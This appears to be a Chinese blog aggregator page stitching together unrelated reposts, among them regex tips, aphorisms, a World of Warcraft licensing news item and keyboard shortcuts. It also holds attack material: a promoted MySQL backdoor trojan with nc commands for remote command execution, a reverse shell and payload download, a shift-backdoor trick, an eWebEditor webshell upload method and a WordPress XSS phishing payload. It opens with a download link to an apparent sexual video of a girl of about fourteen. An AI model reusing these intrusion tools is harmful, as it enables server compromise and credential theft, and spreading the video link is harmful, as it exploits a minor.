酒瓶门，又一起牵扯到90后的不雅照事件.酒瓶门是指最近一名寄宿的在校女生用啤酒瓶自慰并发生性关系，并且录制成视频的事件。

“酒瓶门”事件网上版本

版本一：据说，该女子邀请校外一名男子去她宿舍一起喝啤酒，事后该女子在男子的教唆下用剩下的啤酒瓶子XX，并隐约可以听见该男生指使其使用各种动作配合完成啤酒瓶XX的拍摄过程，然后再与其发生关系。

版本二：女生用啤酒瓶XX，是出于自己的原因，而视频的另外一部分和一名男子发生关系则不从考究，该男子一直未曾露脸，不排除该男子为本视频录制的幕后主使。

从视频里面判断该名女子顶多十四岁，根据《刑法》第二百三十六条行为人明知是不满十四周岁的幼女而与其发生性关系，不论幼女是否自愿，以强奸罪定罪处罚;行为人确实不知对方是不满十四周岁的幼女，双方自愿发生性关系，未造成严重后果，情节显著轻微的，不认为是犯罪.

但是同时也希望现在的小女生要懂得如何保护好自己，以免受到侵害.有时候意识的放纵也许就是一辈子的阴影啊！

网上评论：频频被爆90后门事件，不是偶然，一定 是有一些人故意制造的事件，以谋取其自身的利益。希望有关部门调查事件制造者，以待相应的惩罚。对未成年人应该给予保护，期待这样的事情有不再发生。同时 也希望90后要懂得如何保护好自己，以免受到侵害。有时候意识的放纵也许就是一辈子的阴影。

到底是谁录制并上传了酒瓶门视频？ 是这名女生？还是那个成年男子？小编认为一个小女生再非主流，再不走寻常路，也不会傻到把这样一个可能影响终生幸福和尊严的东西上传到网上供人欣赏吧。小 编同意网友的论断，或许这都是那个成年男子一手操办的，因为整个视频过程那名男子并没有露面。为了寻求刺激？为了报复？这个小编就不了解了。但是小编了解 的是那名女生的后半程将会生活在别人的议论纷纷中。甚至有可能被学校开学而没有任何学校愿意接纳她。她的亲人会怎么想怎么看，含辛茹苦把她抚养成人的父母 又会背负多大的压力，这个就不得而知了。

下载地址：http://www.savefile.com/files/2162068 解压密码jiupingmen

来源:普瑞斯特
Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在 WINXP,WIN2003+MYSQL5.0.X下通过.
安装
将Mysql.php传到PHP服务器上,依填上相应的Host-User-Password-DB后,点击"自动安装Mysql BackDoor"
安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
使用state函数
State 函数实际是一个和PHP的"system()"功能相同的函数,可以用来执行系统命令.在"请输入SQL命令:"处填写要执行的mysql语 句,如" select state("net user nohack /add")",点击"执行SQL语句"后,便会得到运行结果.
使用基于Sniff的后门
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:
1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt!(注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe!(注意:最后的"!"不可省略)
除了发送"Mysql-c-",其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
卸载
在Mysql上运行"drop function state"便可卸载,但同时会造成mysql进程退出,重启后恢复正常.

Mysql BackDoor下载

来源:龙儿心

用shift后门进服务器之后，不用创建用户，只要找到system32文件夹下的tsadmin.exe打开，然后直接连接管理员的账号就可以！也可以在cmd下直接运行tsadmin.exe！退出的时候断开就可以！

正则表达式是一个查询的字符串，它包含一般的字符和一些特殊的字符，特殊字符可以扩展查找字符串的能力，正则表达式在查找和替换字符串的作用不可忽视，它能很好提高工作效率。

EditPlus的查找，替换，文件中查找支持以下的正则表达式：

表达式 说明
\t 制表符.
\n 新行.
. 匹配任意字符.
| 匹配表达式左边和右边的字符. 例如, "ab|bc" 匹配 "ab" 或者 "bc".
[] 匹配列表之中的任何单个字符. 例如, "[ab]" 匹配 "a" 或者 "b". "[0-9]" 匹配任意数字.
[^] 匹配列表之外的任何单个字符. 例如, "[^ab]" 匹配 "a" 和 "b" 以外的字符. "[^0-9]" 匹配任意非数字字符.
* 其左边的字符被匹配任意次(0次，或者多次). 例如 "be*" 匹配 "b", "be" 或者 "bee".
+ 其左边的字符被匹配至少一次(1次，或者多次). 例如 "be+" 匹配 "be" 或者 "bee" 但是不匹配 "b".
? 其左边的字符被匹配0次或者1次. 例如 "be?" 匹配 "b" 或者 "be" 但是不匹配 "bee".
^ 其右边的表达式被匹配在一行的开始. 例如 "^A" 仅仅匹配以 "A" 开头的行.
$Content$nbsp;其左边的表达式被匹配在一行的结尾. 例如 "e$" 仅仅匹配以 "e" 结尾的行.
() 影响表达式匹配的顺序，并且用作表达式的分组标记.
\ 转义字符. 如果你要使用 "\" 本身, 则应该使用 "\\".

例子：

原始串
str[1]abc[991];
str[2]abc[992];
str[11]abc[993];
str[22]abc[994];
str[111]abc[995];
str[222]abc[996];
str[1111]abc[997];
str[2222]abc[999];

目标串：
abc[1];
abc[2];
abc[11];
abc[22];
abc[111];
abc[222];
abc[1111];
abc[2222];

处理：
查找串：str\[([0-9]+)\]abc\[[0-9]+\]
替换串：abc[\1]

【1】正则表达式应用——替换指定内容到行尾
原始文本如下面两行
abc aaaaa
123 abc 444

希望每次遇到“abc”，则替换“abc”以及其后到行尾的内容为“abc efg”
即上面的文本最终替换为：
abc efg
123 abc efg

解决：
① 在替换对话框，查找内容里输入“abc.*”
② 同时勾选“正则表达式”复选框，然后点击“全部替换”按钮
其中，符号的含义如下：
“.” ＝匹配任意字符
“*” ＝匹配0次或更多

注意：其实就是正则表达式替换，这里只是把一些曾经提出的问题加以整理，单纯从正则表达式本身来说，就可以引申出成千上万种特例。
Read the rest of this entry

来源:籽籽在发芽

1，绅士无非就是耐心的狼。

2，老鼠嘲笑猫的时候，身旁必有一个洞。

3，女人吻男人是一种幸福，男人吻女人是一种口福。

4，男人：二十岁的时候，是半成品；三十岁的时候，是成品；四十岁的时候，是精品；五十岁的时候，是极品；六十岁的时候，是样品；七十岁的时候，是纪念品。

5，站在山顶和站在山脚下的两人，虽然地位不同，但在对方眼里，同样的渺小。

6，结论就是你懒得再想下去的地方。――路的尽头，仍然是路，只要你愿意走。

7，使我们不快乐的，都是一些芝麻小事，我们可以躲闪一头大象，却躲不开一只苍蝇。

8，最好的与最坏的创造了历史，平庸之辈则繁衍了种族。

9，在这世上惟一件事比别人议论更糟，那就是无人议论你。

10，一颗将爆的炸弹比一颗已爆的炸弹恐怖得多。 Read the rest of this entry

新华网上海7月21日电（记者 许晓青）国家新闻出版总署有关负责人21日晚间就社会关注的《魔兽世界》审批相关问题接受新华社记者采访。

这位负责人说，《魔兽世界》内容审查工作已经结束，具体修改意见已于7月19日正式提交申报单位。据了解，暴雪公司正在集中力量展开修改工作。

考虑到运营代理转换中有大量数据需要梳理，涉及数以百万计玩家的切身利益。在暴雪公司进行内容修改的同时，允许网之易公司从7月30日起进行内部测试。

内测仅限于原有注册玩家，重点是对玩家在游戏中的各种数据进行有效恢复。内测期间，运营公司不得收费，不得提供新账号的注册，采取一切必要措施，切实维护原有玩家的权益。

这位负责人表示，网之易和暴雪公司应按要求尽快完成游戏修改，确保游戏内容符合国家法律法规；网之易和九城公司应充分关注广大玩家的合理诉求，以高度负责的精神和良好的服务回报玩家的支持和厚爱。

《魔兽世界》是由美国著名游戏公司暴雪娱乐制作的一款网络游戏，中国市场的活跃玩家人数接近500万，约占《魔兽世界》全球玩家人数的30％。今年4月，暴雪终止了与国内代理商九城公司的合作。

而《魔兽世界》迟迟没有重新上线运营，这让已经购买点卡或预存费用的用户心急，玩家也不断发起各种维权活动，要求尽快开通服务或者退款。

来源：zake's blog

今天和静流聊天，他说ewebeditor出了最新漏洞。于是就是检测一下，这个程序爆漏洞一般都是直接上传的漏洞，不过没错 就是上传漏洞。首先在本地搭建一个ASP环境重命名一个木马名字例如：1.gif.asp这样的就OK了。

那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个，目的就是让远程上传。

http://127.0.0.1/1.gif.asp

搭建好了，在上传的地方，图片来源是网络，加上网络地址

然后确定，这里是最关键的一部！ Read the rest of this entry

From：vul.kr

It had been published that wordpress 2.8 All version are suffering from Xss,attackers can use this to do fishing,they make a wordpress login page as it is your own.If you don’t take care,your password will be sent to the attacker’s website.With your password,they can edit pages and upload webshell.It is harmful.

How is the attacker do this?
they insert website url like this(in the comments write place):

http://www.st0p.org’onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);

If someone(or administrator) moved his mouse on the author’s website.It will jump to another URL,which is a fishing page.

How can we patch it?Edit wp-comments-post.php go line 40 and then add:

1
2
3

$comment_author_url = str_replace(chr(39),”,$comment_author_url);
$comment_author_url = str_replace(chr(59),”,$comment_author_url);
$comment_author_url = str_replace(chr(44),”,$comment_author_url);

F1帮助
F2改名
F3搜索
F4地址
F5刷新
F6切换
F10菜单
CTRL+A全选
CTRL+C复制
CTRL+X剪切
CTRL+V粘贴
CTRL+Z撤消
CTRL+O打开
SHIFT+Delete永久删除
Delete删除
ALT+ENTER属性
ALT+F4关闭
CTRL+F4关闭
ALT+TAB切换
ALT+ESC切换
ALT+空格键窗口菜单
CTRL+ESC开始菜单
拖动某一项时按CTRL复制所选项目
拖动某一项时按CTRL+SHIFT创建快捷方式
将光盘插入到CD-ROM驱动器时按SHIFT键阻止光盘自动播放
Ctrl+1,2,3...　切换到从左边数起第1,2,3...个标签
Ctrl+A　全部选中当前页面内容
Ctrl+C　复制当前选中内容
Ctrl+D　打开“添加收藏”面版(把当前页面添加到收藏夹中)
Ctrl+E　打开或关闭“搜索”侧边栏(各种搜索引擎可选)
Ctrl+F　打开“查找”面版
Ctrl+G　打开或关闭“简易收集”面板
Ctrl+H　打开“历史”侧边栏
Ctrl+I　打开“收藏夹”侧边栏/另:将所有垂直平铺或水平平铺或层叠的窗口恢复
Ctrl+K　关闭除当前和锁定标签外的所有标签
Ctrl+L　打开“打开”面版(可以在当前页面打开Iternet地址或其他文件...)
Ctrl+N　新建一个空白窗口(可更改,Maxthon选项→标签→新建)
Ctrl+O　打开“打开”面版(可以在当前页面打开Iternet地址或其他文件...)
Ctrl+P　打开“打印”面板(可以打印网页,图片什么的...)
Ctrl+Q　打开“添加到过滤列表”面板(将当前页面地址发送到过滤列表)
Ctrl+R　刷新当前页面
Ctrl+S　打开“保存网页”面板(可以将当前页面所有内容保存下来)
Ctrl+T　垂直平铺所有窗口
Ctrl+V　粘贴当前剪贴板内的内容
Ctrl+W　关闭当前标签(窗口)
Ctrl+X　剪切当前选中内容(一般只用于文本操作)
Ctrl+Y　重做刚才动作(一般只用于文本操作)
Ctrl+Z　撤消刚才动作(一般只用于文本操作)
Ctrl+F4　关闭当前标签(窗口)
Ctrl+F5　刷新当前页面
Ctrl+F6　按页面打开的先后时间顺序向前切换标签(窗口)
Ctrl+F11　隐藏或显示菜单栏
Ctrl+Tab　以小菜单方式向下切换标签(窗口)
Ctrl+Enter　域名自动完成http://www.XXX.com(内容可更改,Maxthon选项→地址栏→常规)/另:当输入焦点在搜索栏中时,为高亮关键字
Ctrl+拖曳　保存该链接的地址或已选中的文本或指定的图片到一个文件夹中(保存目录可更改,Maxthon选项→保存)
Ctrl+小键盘'+'　当前页面放大20% Read the rest of this entry

一个有意思的BUG.作者不明..

将“ﻬ”这个符号添加到你的QQ名字的最前面.你的QQ号和名字都会返过来的..嘎